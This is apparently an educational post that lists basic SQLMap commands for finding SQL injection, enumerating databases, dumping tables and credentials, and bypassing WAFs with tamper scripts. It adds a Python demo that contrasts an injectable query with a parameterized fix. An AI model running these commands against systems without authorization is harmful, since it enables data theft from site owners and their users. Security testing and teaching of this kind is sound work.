SQLMap commands
This image explains basic SQLMap commands.
• SQLMap is an open-source penetration testing tool used by ethical hackers and security testers to check websites or applications for SQL injection vulnerabilities.
◼️ sqlmap -u URL → Test injection
• Checks if the given website URL is vulnerable to SQL injection.
◼️ sqlmap -u URL --dbs → List databases
• If the site is vulnerable, this lists all databases available on the server.
◼️ sqlmap -u URL -D DB --tables → Show tables
• Shows all tables inside a specific database (DB).
◼️ sqlmap -u URL -D DB -T TABLE --columns → Show columns
• Displays all column names from a specific table in the database.
◼️ sqlmap -u URL -D DB -T TABLE --dump → Dump all data
• Extracts all data (rows) from the selected table.
◼️ sqlmap -u URL -D DB -T TABLE -C col1,col2 --dump → Dump specific columns
• Extracts only selected columns (e.g., usernames, passwords) instead of the whole table.
◼️ sqlmap -u URL --data "param=value" → POST injection test
• Tests SQL injection on sites that use POST requests (like login forms).
◼️ sqlmap -u URL --banner → Show DB version
• Reveals the database system and its version (e.g., MySQL 8.0).
◼️ sqlmap -u URL --tamper=script → WAF bypass
• Rewrites the test payloads with a tamper script to check whether a Web Application Firewall (WAF) can be bypassed.
◼️ sqlmap -u URL -o --output-dir=folder/ → Save results
• Saves all SQLMap findings in a specific folder for later review. The folder is set by --output-dir; -o only turns on SQLMap's optimization switches.
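What the "Test injection" step is looking for, and the fix that makes it come back negative, as an added example (not part of the original post and not SQLMap's own code). The in-memory SQLite table, the function names and the true/false probe strings are assumptions constructed for the demonstration.

```python
import sqlite3


def make_db():
    # Constructed sample data for the demonstration.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO products VALUES (?, ?)",
                   [(1, "keyboard"), (2, "mouse")])
    return db


def lookup_vulnerable(db, item_id):
    # The request parameter is pasted into the SQL text, so it can change the query.
    sql = "SELECT name FROM products WHERE id = " + item_id
    return [row[0] for row in db.execute(sql)]


def lookup_parameterized(db, item_id):
    # The parameter is bound as data and can never become SQL syntax.
    return [row[0] for row in db.execute(
        "SELECT name FROM products WHERE id = ?", (item_id,))]


def responds_to_boolean_logic(lookup, db, base="1"):
    """Return True if an appended always-true condition leaves the result
    unchanged while an always-false one changes it. That difference means
    the parameter is being interpreted as SQL, i.e. it is injectable."""
    baseline = lookup(db, base)
    when_true = lookup(db, base + " AND 1=1")
    when_false = lookup(db, base + " AND 1=2")
    return when_true == baseline and when_false != baseline


if __name__ == "__main__":
    db = make_db()
    print("concatenated query injectable: ",
          responds_to_boolean_logic(lookup_vulnerable, db))
    print("parameterized query injectable:",
          responds_to_boolean_logic(lookup_parameterized, db))
```

With the parameterized version, every later command in the list (--dbs, --tables, --dump) has nothing to work with, because the input never reaches the SQL parser as code.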
✓ Purpose:
These commands are mainly used by security professionals, penetration testers, and ethical hackers to test if a system is secure.
× Note:
Unauthorized use of SQLMap on websites without permission is illegal. It should only be used for educational purposes or on systems you own or have permission to test.